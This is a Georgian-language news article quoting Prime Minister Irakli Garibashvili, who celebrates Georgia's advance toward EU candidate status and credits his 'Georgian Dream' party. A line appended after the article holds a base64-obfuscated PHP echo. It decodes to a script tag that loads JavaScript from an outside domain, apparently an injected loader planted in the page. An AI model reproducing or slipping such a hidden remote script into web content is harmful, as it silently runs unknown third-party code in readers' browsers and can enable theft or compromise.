celsiusi
ავერსი საქკაბელი

კიდევ ერთხელ მინდა, მივულოცო ჩვენი ქვეყნის თითოეულ მოქალაქეს, ჩვენს ხალხს პირველ რიგში, ვინაიდან ეს გამარჯვება და ეს აღიარება, ეს ღირსეული გადაწყვეტილება, ეკუთვნის ჩვენს ხალხს, რომელსაც ჩვენი მთავრობა და ჩვენი ხელისუფლება წარმოადგენ, – ამის შესახებ პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა განაცხადა.

ღარიბაშვილის თქმით, საქართველომ და ქართველმა ხალხმა გაიმარჯვა.

„კიდევ ერთხელ მინდა, მადლობა გადავუხადო ჩვენს გუნდს, საჯარო მოხელეებს, მთავრობას, საგარეო საქმეთა სამინისტროს, ჩვენს დიპლომატებს, ჩვენს პარლამენტს, ვინაიდან 100-ზე მეტი დოკუმენტი იქნა მიღებული და შექმნილი, უზარმაზარი სამუშაო უდავოდ უნდა ითქვას, რომ გასწია მთელმა გუნდმა. ახლა ჩვენ გავაგრძელებთ მუდმივ დიალოგს, ისე როგორც ვაგრძელებდით მანამდე, ჩვენს ევროპელ კოლეგებთან. ჩვენ გვექნება მჭიდრო კოორდინაცია ჩვენს ევროპელ მეგობრებთან და აქვე მინდა, აღვნიშნო, მიუხედავად უამრავი დაბრკოლებისა, მიუხედავად უამრავი წინააღმდეგობისა, საბოტაჟისა თუ პროვოკაციებისა, არაერთი დესტრუქციული ქმედებებისა, შიდა თუ გარე მტრების ერთობლივი კოორდინირებული მოქმედებების, ჩვენ გავიმარჯვებთ, ჩვენმა ქვეყანამ გაიმარჯვა დღეს, ჩვენმა ხალხმა გაიმარჯვა, გაიმარჯვა ჩვენმა სიმართლემ და კიდევ ერთხელ გულითადად გილოცავთ ყველას დღევანდელ აღიარებას“, – განაცხადა ღარიბაშვილმა.

ირაკლი ღარიბაშვილის განცხადებით, თუკი რომელიმე ხელისუფალმა, მმართველმა რაიმე ხელშესახები გააკეთა ევროინტეგრაციის გზაზე, ეს არის „ქართული ოცნება“. მისივე თქმით, სტატუსის მიღებით სხვა რეალობაში აღმოჩნდება საქართველო.

გახსოვთ, შარშან საკმაოდ გულდაწყვეტილი ვიყავით, ვინაიდან საქართველომ ვერ მიიღო კანდიდატის სტატუსი. ჩვენთვის ეს იყო ერთგვარი დამაბრკოლებელი და შეიძლება ითქვას, გულდასაწყვეტი ფაქტი, თუმცა დღეს ვართ ამაყად. მჯერა, დეკემბერში ჩვენი ქვეყანა მიიღებს სტატუსს, საბოლოოდ გაფორმდება დღევანდელი გადაწყვეტილება, შეიძლება ითქვას, სხვა რეალობაში აღმოჩნდება ჩვენი ქვეყანა. ევროინტეგრაციის გზაზე ეს უდავოდ ძალიან ძლიერი წინ გადადგმული ნაბიჯია“, – განაცხადა ირაკლი ღარიბაშვილმა.

„მინდა, ასევე ერთგვარი შეჯამება გავაკეთო ჩვენი გუნდის მიერ მიღწეული შედეგებისა, დღევანდელი დღე არის ერთგვარი დამაგვირგვინებელი და შემაჯამებელი ჩვენი 11-წლიანი საქმიანობისა, რომელმაც მოიტანა მშვიდობა, სტაბილურობა, დიდი ტრანსფორმაცია და ცვლილება. ევროპეიზაციის ათი წელი, შეიძლება ასე ვუწოდოთ ამ მშვიდობიან ათწლიან პერიოდს, ვინაიდან თუ ვინმე, რომელიმე ხელისუფალმა და მმართველმა რაიმე ხელშესახები გააკეთა ევროინტეგრაციის გზაზე, ეს არის „ქართული ოცნება“. ეს არის ასოცირების შეთანხმება, თავისუფალო ვაჭრობა, უვიზო რეჟიმი, ევროპული პერსპექტივა, რომელიც ჩვენ შარშან მივიღეთ და ახლა უკვე კანდიდატის სტატუსი, რომელიც მჯერა, დეკემბერში გაფორმდება. ეს არის შეჯამება ჩვენი მუშაობის, ჩვენი მმართველობის. ბოლო 11 წელიწადში  ქვეყანამ მიაღწია უპრეცედენტო მშვიდობას, სტაბილურობას არნახული გამოწვევებისა და რეგიონში გართულებული უსაფრთხოების გარემოს მიუხედავად. ეს ვერ მოხდებოდა, ამის მიღწევა შეუძლებელი იქნებოდა, ბიძინა ივანიშვილს და მთლიანად მის გუნდს, „ქართულ ოცნებას“ ისტორიული, გარდამტეხი ცვლილება რომ არ მოეხდინა. ვაგრძელებთ ამ დიდ ეროვნულ საქმეს“, – განაცხადა ირაკლი ღარიბაშვილმა.

191
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");